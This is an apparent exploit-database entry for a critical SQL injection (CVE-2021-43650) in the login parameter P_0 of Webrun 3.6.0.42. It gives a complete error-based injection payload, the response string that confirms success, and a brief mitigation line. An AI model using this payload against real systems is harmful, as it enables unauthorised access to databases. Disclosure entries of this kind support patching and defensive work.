vendor:
Webrun
by:
Vinicius Alves
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Webrun
Affected Version From: 3.6.0.42
Affected Version To: 3.6.0.42
Patch Exists: YES
Related CWE: CVE-2021-43650
CPE: a:softwell:webrun:3.6.0.42
Platforms Tested: Kali Linux 2021.3
2021
Webrun 3.6.0.42 – ‘P_0’ SQL Injection
Webrun version 3.6.0.42 is vulnerable to SQL Injection, applied to the P_0 parameter used to set the username during the login process. In the post request, change the P_0 value to the following payload: 121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd. If the return has the value 'qvvxq1qbzbq', you will be able to successfully exploit this.
Mitigation:
Ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.